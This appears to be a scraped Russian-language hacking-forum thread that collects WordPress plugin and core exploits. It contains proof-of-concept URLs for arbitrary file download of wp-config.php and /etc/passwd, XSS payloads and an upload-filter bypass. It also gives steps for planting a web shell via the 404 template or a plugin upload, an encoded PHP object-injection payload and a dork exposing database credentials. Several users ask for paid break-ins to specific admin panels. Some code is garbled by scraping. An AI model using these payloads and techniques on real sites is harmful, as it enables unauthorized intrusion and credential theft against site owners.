@version:2.7
Уязвимый код:
$file=dirname(dirname(dirname(__FILE__)))."/uploads/mac-dock-gallery/".$_GET['albid'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.basename($fi le));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: '.filesize($file));
ob_clean();
flush();
readfile($file);
POC:
PATCH:
https://wordpress.org/plugins/mac-dock-gallery/other_notes/
Ну и xss там же
http://crytotheblind.com/site/wp-content/plugins/mac-dock-gallery/mac_imageview.php?mac_albid=1">&limit=42
Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
Affected Versions: 4.2.1 and probably below
Proof of Concept URL for DOM XSS in WordPress:
http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#
Source: http://seclists.org/bugtraq/2015/May/56
↑ (https://antichat.live/posts/3846875/)
Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
Affected Versions:
4.2.1
and probably below
Proof of Concept URL for DOM XSS in WordPress:
http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#
Source:
http://seclists.org/bugtraq/2015/May/56
Или вот такой вектор для Хрома
[URL="http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#1
↑ (https://antichat.live/posts/3841833/)
нужно отправить POST запрос, где при отправке подменить расширение с jpg на php
шелл будет по адресу /wp-content/gallery/folder_name/shell.php
А разве для этого не нужны админ права?
winstrool
05.06.2015, 00:38
В паблике была опубликована такая бага:
https://www.exploit-db.com/exploits/37166/ - [SIZE="2"][B]WordPress dzs-zoomsounds Plugins invalid extension - disallowed_filetypeshideFeedbacksCall()'[/COLOR]);
}
if (!is_writable($upload_dir)) {
die('dir not writable - check permissionshideFeedbacksCall()');
}
if (copy($_FILES['file_field']['tmp_name'],$path)) {
echo'file uploadedtop.hideFeedbac ksCall();';
} else {
echo'file could not be uploade dwindow.hideFeedbacksCall()';
}
} else {
$headers=get_theheaders();
if (isset($headers['HTTP_X_FILE_NAME'])) {
//print_r($headers);
$file_name=$headers['HTTP_X_FILE_NAME'];
$file_name=str_replace(" ","_",$file_name);// strip spaces
$target=$upload_dir."/".$file_name;
//==== checking for disallowed file types
$sw=false;
foreach ($disallowed_filetypesas$ dft) {
$pos=strpos($file_name,$dft);
if ($pos!==false) {
$sw=true;
}
}
if ($sw==true) {
die('invalid extension - disallowed_filetypes');
}
if (!is_writable($upload_dir)) {
die('dir not writable - check permissions');
}
//echo $target;
$content=file_get_contents("php://input");
if (file_put_contents($target,$co ntent)) {
echo'success';
} else {
die('error at file_put_c ontents');
}
} else {
die('not for direct access');
}
}[/COLOR]
[/PHP]
максимальная строчка с набором расширений на глаза попалась такая:
$disallowed_filetypes = array('.php', '.exe', '.shtml', '.html', '.htm','.phtml','.php5', '.php4', '.pl', '.py', '.rb', '.htaccess', '.asp', '.jsp', '.aspx');
но кто поймет этот участок кода:
foreach ($disallowed_filetypesas$dft) {
$pos=strpos($file_name,$dft);
if ($pos!==false) {
$sw=true;
}
}
поймет что нам это не помеха ;-)
Пассивные XSS:
wp-content/plugins/dzs-videogallery/ajax.php?source="/>alert();
wp-content/plugins/dzs-videogallery/ajax.php?type="/>alert();
http://digitalzoomstudio.net/ - блог автора
http://codecanyon.net/user/ZoomIt/portfolio - портфолио продаж компонентов
P.S: Тэги для гугла)) dzs-videogallery exploit, dzs-zoomsounds exploit, dzs-calendar exploit, html5uploader exploit, php_ygallery exploit, php_mediagallery exploit, custom_rapista exploit, themes/royale/ exploit
↑ (https://antichat.live/posts/3855665/)
foreach (
$disallowed_filetypes
as
$dft
) {
$pos
=
strpos
(
$file_name
,
$dft
);
if (
$pos
!==
false
) {
$sw
=
true
;
}
}
А как такое обходиться ?
winstrool
05.06.2015, 22:51
↑ (https://antichat.live/posts/3855944/)
А как такое обходиться ?
смотрите в сторону функций http://php.net/manual/ru/function.strpos.php и http://php.net/manual/ru/function.stripos.php (http://php.net/manual/ru/function.strpos.php)
blackbox
21.06.2015, 17:47
↑ (https://antichat.live/posts/3855950/)
смотрите в сторону функций
http://php.net/manual/ru/function.strpos.php и http://php.net/manual/ru/function.stripos.php (http://php.net/manual/ru/function.strpos.php)
я тоже не совсем понял, можно просто регистр в расширении другой поставить и тогда такой файл пройдет?
↑ (https://antichat.live/posts/3861082/)
я тоже не совсем понял, можно просто регистр в расширении другой поставить и тогда такой файл пройдет?
да, пройдет
WP 3D Twitter Wall
# Vendor: https://wordpress.org/plugins/3d-twitter-wall/
#/wp-content/plugins/3d-twitter-wall/proxy.php
$url = ($_POST['url']) ? $_POST['url'] : $_GET['url'];
...
$session = curl_init($url); // $url = $_GET['url'] OR $_POST['url']
...
$response = curl_exec($session);
echo $response;
curl_close($session);
POC: _http://example.com/plugins/3d-twitter-wall/proxy.php?url=file:///etc/passwd
WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]
# Exploit Title: WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]
# Date: 2015-07-10
# Google Dork:
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link: https://downloads.wordpress.org/plugin/cp-image-store.1.0.5.zip
# Version: 1.0.5
# Tested on: windows 7 + firefox.
====================
DESCRIPTION
====================
A vulnerability has been detected in the WordPress CP Image Store with Slideshow plugin in version 1.0.5 .
The vulnerability allows remote attackers to download arbitrary files from the server.
The Arbitrary file download vulnerability is located in the `cp-image-store.php` file.
The web vulnerability can be exploited by remote attackers without privileged application user account
and without required user interaction. Successful exploitation of the Arbitrary file download vulnerability results
in application compromise.
==============
POC
==============
# http://wp-host/wp-path/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=../../../../wp-config.php HTTP/1.1
the purchase_id parameter can be bruteforced and succesfully exploit this vulnerability.
==================
VULNERABLE CODE
==================
Located in cp-image-store.php
function cpis_download_file(){
...
if( isset( $_REQUEST[ 'f' ] ) && cpis_check_download_permissions() ){
header( 'Content-Type: '.cpis_mime_content_type( basename( $_REQUEST[ 'f' ] ) ) );
header( 'Content-Disposition: attachment; filename="'.$_REQUEST[ 'f' ].'"' );
if( cpis_checkMemory( array( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] ) ) ){
readfile( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] );
}else{
@unlink( CPIS_DOWNLOAD.'/.htaccess');
header( 'location:'.CPIS_PLUGIN_URL.'/downloads/'.$_REQUEST[ 'f' ] );
}
...
}
Вот интересная бага:
http://seclists.org/fulldisclosure/2015/Feb/75
Но я до чего-то вразумительтного ее не докрутил
admin.php?page=wc-reports&";>
admin.php?page=wc-reports&";>WOW
https://github.com/claudioviviani/wordbrutepress
Многопоточный брут ВП стандартным перебором и используя xml-rpc
1) Multithreading
2) xml-rpc brute force mode
3) http and https protocols support
4) Random User Agent
5) Big wordlist support
(https://github.com/claudioviviani/wordbrutepress)
Contact form 7
Full Path Disclosure
wp-content/plugins/contact-form-7/includes/upgrade.php
/wp-content/plugins/contact-form-7/modules/acceptance.php
/wp-content/plugins/contact-form-7/modules/akismet.php
/wp-content/plugins/contact-form-7/modules/checkbox.php
/wp-content/plugins/contact-form-7/modules/count.php
/wp-content/plugins/contact-form-7/modules/date.php
/wp-content/plugins/contact-form-7/modules/file.php
/wp-content/plugins/contact-form-7/modules/flamingo.php
/wp-content/plugins/contact-form-7/modules/jetpack.php
/wp-content/plugins/contact-form-7/modules/listo.php
/wp-content/plugins/contact-form-7/modules/number.php
/wp-content/plugins/contact-form-7/modules/quiz.php
/wp-content/plugins/contact-form-7/modules/really-simple-captcha.php
/wp-content/plugins/contact-form-7/modules/recaptcha.php
/wp-content/plugins/contact-form-7/modules/response.php
/wp-content/plugins/contact-form-7/modules/select.php
/wp-content/plugins/contact-form-7/modules/submit.php
/wp-content/plugins/contact-form-7/modules/text.php
/wp-content/plugins/contact-form-7/modules/textarea.php
https://github.com/rastating/wordpress-exploit-framework
Ruby фреймворк для эскплутации и тестирования WP
статья на английском
http://www.kitploit.com/2016/03/wordpress-exploit-framework-ruby.html
какие методы есть заливки шелла в wp?
powerOfthemind
20.04.2016, 15:52
↑ (https://antichat.live/posts/3975762/)
какие методы есть заливки шелла в wp?
Смотря какие у тебя права в админк, если можешь редактировать шаблон то в страницу 404 пихаешь код шела и радуешься или через загрузку плагина, пакуешь в архив шел и льеш на сайт.
WordPress Plugin Quick Page/Post Redirect Open Redirect Current plugin version: 5.1.3.
WordPress Plugin WooCommerce-excelling eCommerce Cross-Site Scripting Current plugin version: 2.3.13.
Есть чтонить под эти плагины?
есть что нибудь на WordPress 4.4.4 ?
↑ (https://antichat.live/posts/3984105/)
есть что нибудь на WordPress 4.4.4 ?
Я нашёл токо это,но XSS ^.^
сайт.ру/wp-admin/customize.php?theme=
Как можно взломать WP сайт посоветуйте способы
↑ (https://antichat.live/posts/3984665/)
Как можно взломать WP сайт посоветуйте способы
Версию WP.
powerOfthemind
30.08.2016, 12:09
↑ (https://antichat.live/posts/3984665/)
Как можно взломать WP сайт посоветуйте способы
Cmsmap просканируй ,посмотри какие плагины стоят, потом ищи под них сплоит или ищи сам дыры в плагинах
как узнать полный путь версия 4.6
Доброго времени суток. Есть необходимость получить доступ к админке wordpress 4.5.2. Возможно ли такое?
↑ (https://antichat.live/posts/3994483/)
Доброго времени суток. Есть необходимость получить доступ к админке wordpress 4.5.2. Возможно ли такое?
Попробуй эксплоит найти но я посмотрел не нашёл, и проскань впсканом
↑ (https://antichat.live/posts/3994539/)
Попробуй эксплоит нйти но я посмотрел не нашёл, и проскань впсканом
Впскан не кажет уязвимостей... Вопрос актуален, естественно все труды будут оплачены.
↑ (https://antichat.live/posts/3994649/)
Впскан не кажет уязвимостей... Вопрос актуален, естественно все труды будут оплачены.
кинь ссылку в лс
Вопрос по админке актуален
jakonda1001
28.09.2016, 12:50
скинь в личку
Народ, неужели это нереально?
Всем привет, никто не находил уязвимости в вп 4.4.5?
winstrool
10.10.2016, 22:12
0day exploit for WordPress plugins «Simple Ads Manager, SAM Pro Lite, SAM Pro (Free Edition)» (http://portfob.ru/security-time/0day-exploit-for-wordpress-plugins-simple-ads-manager-sam-pro-lite-sam-pro-free-edition/)
abrakadabra
31.12.2016, 11:23
WordPress Version 4.6.1
google-capcha
contact form 7
что можно сделать подскажите .
SnoopDog007
02.01.2017, 13:46
Есть сайт на нем проверенная CVE-2015-4566, как можно увести куки?
Wordpress 4.3.1
↑ (https://antichat.live/posts/4000504/)
0day exploit for WordPress plugins «Simple Ads Manager, SAM Pro Lite, SAM Pro (Free Edition)» (http://portfob.ru/security-time/0day-exploit-for-wordpress-plugins-simple-ads-manager-sam-pro-lite-sam-pro-free-edition/)
Судя по приведённому коду в блоге, при LFI, нуллбайт не обязателен и эксп может использоваться на свежих пыхах:
wap=base64_encode('/../wp-action.php/../../../../../../../../../../../etc/passwd');
[B]Wordpress 'Foo', 'TextDomain'=>'Bar');
private \$theme_root = '$ftp';
private \$stylesheet = '$dir';
}
");
$default='a:2:{i:2;a:1:{s:5:"title";s:0:"";}s:12:"_multiwidget";i:1;}';
$arr=unserialize($default);
$arr[2]['title'] = newWP_Theme;
echo"\nPayload: \nUPDATE wp_options SET option_valu e = 0x".ascii2hex(serialize($arr))." WHERE wp_options.option_id = ".$option_id."\n";
echo"\nRestore: \nUPDATE wp_options SET option_valu e = 0x".ascii2hex($default)." WHERE wp_options.option_id = ".$option_id."\n";
echo"\nCheck it:\n\n$ftp/path/to/anonymous/directory/$dir/languages/$file\n\n";
if(!file_exists($file))file_put_contents($file,gzd ecode(base64_decode('H4sIAAAAAAAAA3VRz08UMRQu4mnkx MGThx40COQxO4uaTTd7EBiQZCcuu7NqYgwpM8/Zkm47aTsESLj5L/jv+V94982OChde8vV9bb/k/fh+bT79ySjWCS8Ib1gX4wf5OSEjPCOUhB9rjNV/338TjyhvPKHjveF4LZe1RvbK/6OefUCtLf9snS7ZxNlLLAKclvAJnVfWCD62heVHuLTRFGvrAmS +UiUcNJWH3AoeTT7mcOhQBpLDkQwoeL+XvIMkgX6fJ2/F/v5uj4KEMMUr5R/VDTrdWPoAuZPGaxmsoxJjaapGVgg5yqXgs1oa5Rf/nwVHD+ksmujGSQ3H1i294KZeXf2oP+QdHSXbwzu8kvr1y/NpejZPZ/nXLVfg1rftYbwTZadZej93steLDq0JaKiZm5qKBLwOca2lMkNe LKTzGEbz/BgG97q26e/oIDWFLZWpBB9cqBB9gXaLMLMNVWu51G3T5nw6p78TNOi6SVfLB r4IofYijnWrVB73LtRtzOZk4CWSa3ZlYEfJQKslzxpTWhb9AQt sWO0xAgAA')));
functionascii2hex($p){$r='';for($i=0;$i[/COLOR]
[/PHP]
abrakadabra
05.01.2017, 11:08
↑ (https://antichat.live/posts/3924314/)
https://github.com/claudioviviani/wordbrutepress
Там ошибки вылетают, с функцией print ни на версии 27 и 35 питоне не запускаеться.
kacergei
18.01.2017, 14:21
WordPress 4.6.2 через соседние самописные скрипты имею sql-injection (только просмотр БД)
Пароли на расшифровке на неизвестное время
Можно ли как то задействовать функцию восстановления пароля?
Как привести в нормальный вид хеш содержащиеся в wp_users -> user_activation_key Вида (1484638848:$P$BT9pkNHDgo7gLHb1VaK1MoqYppOuC0) (пару символов неверны), что бы в URL'e указать
Ravenous
18.01.2017, 23:52
↑ (https://antichat.live/posts/4037448/)
WordPress 4.6.2 через соседние самописные скрипты имею sql-injection (только просмотр БД)
Пароли на расшифровке на неизвестное время
Можно ли как то задействовать функцию восстановления пароля?
Как привести в нормальный вид хеш содержащиеся в wp_users -> user_activation_key Вида (1484638848:$P$BT9pkNHDgo7gLHb1VaK1MoqYppOuC0) (пару символов неверны), что бы в URL'e указать
никак. user-activation-key зашифрован так же, как пароль. Он хранился в чистом виде только в древних версиях
кто нибудь слышал об sql injection от версии 4.7 и ниже.
как я понял уязвимость находиться wp_query
↑ (https://antichat.live/posts/4041348/)
кто нибудь слышал об sql injection от версии 4.7 и ниже.
как я понял уязвимость находиться wp_query
Баг из разряда гипотетических:
WP_Query is vulnerable to a SQL injection (SQLi) when passing unsafe data. WordPress core is not directly vulnerable to this issue, but we’ve added hardening to prevent plugins and themes from accidentally causing a vulnerability.
https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb (http://%20https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb)
Wordpress 4.*.*
Full Path Disclosure
wordpress/wp-login.php
POST: log[]=1&pwd[]=1&redirect_to[]=
wp-json
GET: wordpress/wp-json/oembed/1.0/embed?format=xml&url[]=123
Cookie: comment_author_email_dbdee7661db32144cd2347d98b860 504[]
Wordpress 4.7.2
Stored XSS
Привилегии: Редактор+
/wp/wp-comments-post.php
POST: comment=">alert('XSS');
http://rgho.st/7kvhw9tvL/image.png
mazaxaka
12.03.2017, 00:12
↑ (https://antichat.live/posts/4046514/)
Wordpress 4.*.*
Full Path Disclosure
wordpress/wp-login.php
POST: log[]=1&pwd[]=1&redirect_to[]=
wp-json
GET: wordpress/wp-json/oembed/1.0/embed?format=xml&url[]=123
Cookie: comment_author_email_dbdee7661db32144cd2347d98b860 504[]
Wordpress 4.7.2
Stored XSS
Привилегии: Редактор+
/wp/wp-comments-post.php
POST: comment=">alert('XSS');
http://rgho.st/7kvhw9tvL/image.png
раскрытие путей работает только через wp-login.php и то редко, wp-json вообще не работает, можно подробней?
loverast
12.03.2017, 19:05
Кто нибудь заюзал эту багу https://xakep.ru/2017/03/01/nextgen-gallery-sql-injection/ ?
Народ, нужна ваша помощь:
1 у кого-то когда-то срабатывали эксплоиты на ВП из метасплоита???
2 - https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
как применить его на практике?
ArturKonDoil
29.03.2017, 21:52
Всем доброго времени суток. Нужна помощь в получении доступа к админке WordPress 4.7.3, естественно не бесплатно. Можно в личку.
karkajoi
31.03.2017, 15:24
↑ (https://antichat.live/posts/4063298/)
Народ, нужна ваша помощь:
1 у кого-то когда-то срабатывали эксплоиты на ВП из метасплоита???
2 -
https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
как применить его на практике?
Работали. Юзал эксполит на добовление админа через SQL inj в каком-то плагине.По 2му вопросу я хз.
Посоветуйте хороший чекер на уязвимости для WP ?
↑ (https://antichat.live/posts/4067176/)
Посоветуйте хороший чекер на уязвимости для WP ?
https://github.com/wpscanteam/wpscan (c) Google Search
Здравствуйте форумчане
помогите с доступом к пользователям, сайт на WP
Детальнее в личке.
В связи с переходом многих хостинг компаний на PHP7 и другие версии, в которых отсутствуют некоторые функции, стали появляться интересные сообщения об ошибках, включающие чувствительную информацию. Следующий пример демонстрирует раскрытие данных для подключения к базе данных.
.SpoilerTarget" type="button">Spoiler: Click
depts.washington.edu/leaders1/elizabeth-smith/feed/
Dork:
intext:Stack trace #0 wpdb->__construct(
jakonda1001
12.01.2018, 11:03
нашел способ заливки шелла в wordpress при наличии подключения к mysql и админки (при условие что все папки под запись закрыты или стоит .htaccess) или я изобрел велосипед?
jakonda1001
16.01.2018, 03:13
не
Привет народ подскажите литературу о поиске и использовании уязвимости WP
Подскажите, пожалуйста, какие есть рабочие уязвимости на wordpress 3.9.1 ?
newaddidas
20.03.2019, 22:35
Версия 4.2.2 Посоветуйте
Rastamanka
22.10.2019, 14:35
↑ (https://antichat.live/posts/4172133/)
нашел способ заливки шелла в wordpress при наличии подключения к mysql и админки (при условие что все папки под запись закрыты или стоит .htaccess) или я изобрел велосипед?
Что за способ если не секрет?
Privet, kto znaet kak izpolzuvats etot? https://wpvulndb.com/vulnerabilities/9955
karkajoi
23.11.2019, 05:00
при наличии админки, шел льется в 404 ошибку, вернее в этот файл
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot